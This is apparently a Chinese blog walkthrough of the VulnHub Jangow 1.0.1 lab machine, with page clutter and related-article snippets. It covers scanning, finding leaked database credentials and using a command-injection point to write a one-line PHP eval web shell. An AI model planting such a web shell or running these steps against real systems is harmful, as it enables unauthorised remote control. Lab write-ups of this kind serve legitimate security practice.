Jangow-1.0.1靶机

最新推荐文章于 2024-08-05 19:57:52 发布
最新推荐文章于 2024-08-05 19:57:52 发布
阅读量303 收藏 4
点赞数 3
文章标签: 网络安全 安全 web安全 github 开源
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_61995767/article/details/140418199
版权

靶机地址:https://vulnhub.com/entry/jangow-101,754/

一、信息收集

步骤一:导入并配置靶机为桥接模式而后开启...获取其MAC地址信息...如下

步骤二:主机发现

nmap 192.168.7.0/24

对应靶机的MAC地址得到IP地址为:192.168.193.143

步骤三:端口扫描

nmap -sV -p- 192.168.193.143

步骤四:访问IP地址,发现Index of /页面并点击其中的site目录

步骤五:在kali攻击机上使用dirsearch对http://192.168.193.143进行目录扫描

dirsearch -u http://192.168.193.143

拼接/.backup,发现了数据库的账号密码

步骤六:再对http://192.168.193.143/site/进行目录扫描,扫描的同时在原页面寻找特殊功能点;

dirsearch -u http://192.168.193.143/site/

拼接/site/assets/ ,无有用信息;

拼接/site/js/ ,也无有用信息;

那就只能测试前端功能,发现在点击Buscar时出现以下接口给上命令且执行成功

二、GetShell

步骤七:在此命令执行处拼接以下代码尝试直接GetShell

echo '<?php phpinfo();@eval($_POST[cmd]); ?>' > heihei.php

访问heihei.php文件

蚁剑连接

步骤八:根据上方扫描的端口21——ftp服务以及数据库的账号密码进行远程连接,但发现无有用信息

嗷嗷~嗷嗷~
关注
  • 3
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
jangow-01-1.0.1
qq_46140711的博客
09-22 1199
jangow-01-1.0.1靶机练习
VulnHub靶机-Jangow: 1.0.1
weixin_46694260的博客
09-15 2695
迟到的文章,就当库存发出来吧~
Vulnhub靶机JANGOW_ 1.0.1
LainWith的博客
10-06 1183
Jangow(此系列共1台)发布日期:2021年11月4日难度:低提示信息:爆破是拿下靶机的重要手段目标:取得 root 权限 + Flag主机发现端口扫描路径枚举命令执行反弹shellftp利用内核提权靶机练习-JANGOW: 1.0.1。
Vulnhub靶机随笔-Jangow 1.0.1
weixin_59005129的博客
03-21 681
C.提权 内核提权 第三步 通过SCP将45010.c文件从Linux中传输到物理机中 在Windows的cmd中输入下方命令 这里需要将ssh的配置文件更改为允许root登录 命令: scp root@攻击机IP:文件所在位置 ./ 第五步 通过gcc编译45010.c文件 命令: gcc 45010.c -o exp 这里不用加-c参数
jangow-01靶机全过程(超详细!)
qq_68868384的博客
08-09 282
使用nmap进行全网段大致扫描-sS:半开放扫描,扫描时不完成tcp的连接,这样可以使扫描更加隐蔽且更快-T4:paranoid (0), sneaky (1), polite (2), normal (3),侵略性(4)和疯狂(5)。前两个是为了逃避IDS(入侵检测系统)。礼貌模式减慢扫描速度以使用更少的带宽目标机器资源。正常模式是默认的,所以-T3什么也不做。侵略性模式将扫描速度提高到假设您在一个相当快速和可靠的网络上。
rocketmq-dashboard-1.0.1-SNAPSHOT.jar
01-08
rocketMQ可视化工具,控制台输入java -jar jar包路径 即可启动服务,访问localhost:8080即可看到仪表台
rocketmq控制台最新版rocketmq-dashboard-1.0.1-SNAPSHOT.jar
06-15
dockerhub的镜像是几年前的了,特意打包了一个最新版分享
rocketmq-console-ng-1.0.1.jar
05-07
RocketMQ的可视化管理控制台 启动命令 nohup java -jar -Drocketmq.config.namesrvAddr=127.0.0.1:9876 -Dserver.port=8080 rocketmq-console-ng-1.0.1.jar & 端口号和nameserver地址可修改
每周打靶练习之JANGOW1.0.1
chhsbsjs的博客
01-29 493
之后在原来的页面下随便点击功能点发现Buscar点进去就是刚刚扫描出来的空白页但是后面多了个参数,试试命令执行。发现该目录下还有一个wordpress目录,进去发现一个config配置文件,有数据库账号密码。然后试了各种方法都没有反弹回来,后来发现靶机只能通过443端口通信所以我们对命令进行一个修改。我们选择一个下载后上传上去,先上传到网站目录下我们在移到家目录下然后赋予权限。
vulnhub 靶机 Jangow: 1.0.1
qq_44029310的博客
06-11 3159
一次打靶记录。
Jangow-1.0.1打靶渗透【附POC】
weixin_52487093的博客
07-12 313
存在回显,可以利用,尝试写入一句话木马;存在敏感信息database、username、password;逐个点击到Buscar时跳转到空白页面,但是存在疑似可以利用的功能点。逐个点击页面存在的内容,查看是否有可以利用的点;尝试使用蚁剑连接->连接成功。
jangow靶机渗透
qq_42307546的博客
01-23 979
今天给大家带来一个简单难度的靶机 首先主机扫描 netdiscover -i eth0 192.168.1.1/24 扫出靶机地址为 192.168.1.13 nmap 扫描 nmap -sV -p 0-6550 192.168.1.13 Starting Nmap 7.80 ( https://nmap.org ) at 2022-01-23 14:13 CST Nmap scan report for 192.168.1.13 Host is up (0.00071s latency). Not sho
VulnHub1:Jangow: 1.0.1靶机入侵
g457499940的专栏
08-12 733
网络安全
VulnhubJANGOW靶机详解
最新发布
weixin_62457642的博客
08-05 493
靶机JANGOW速刷
靶机渗透日记 Jangow
Anonymous
02-10 295
ip 端口 测试发现不能匿名登录 ftp 目录扫描 发现敏感文件 .backup 访问 浏览网站页面,发现其中一个页面可以执行命令 利用命令执行无法反弹shell,生成一句话 在 /home/jangow01 得到 flag1 发现 443 端口没有被做限制 反弹shell 发现存在 jangow01 用户 使用 .backup 里的账号密码尝试登录 提权 可以看到可以使用 dirtycow 进行提权 ,靶机直接死机 换成 CVE-201..
vulnhub靶场,JANGOW: 1.0.1
kukudeshuo的博客
02-17 1944
vulnhub靶场,JANGOW: 1.0.1 环境准备 靶机下载地址:https://www.vulnhub.com/entry/jangow-101,754/ 攻击机:kali(192.168.109.128) 靶机JANGOW: 1.0.1(192.168.109.198) 下载好靶机之后直接使用VMware Workstation Pro虚拟机导入环境,启动即可,将网段设置为NAT模式 目标:提升为root权限获取root目录下的flag 信息收集 使用arp-scan确定目标靶机 确定目标靶机
vulnhub靶机-jangow: 1.0.1
03-16
vulnhub靶机-jangow: 1..1是一款用于渗透测试和漏洞攻击的虚拟机。它基于Ubuntu操作系统,包含多个漏洞和弱点,供安全专业人员进行测试和实践。该靶机的目标是获取root权限,并且需要使用各种技术和工具来完成任务。...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值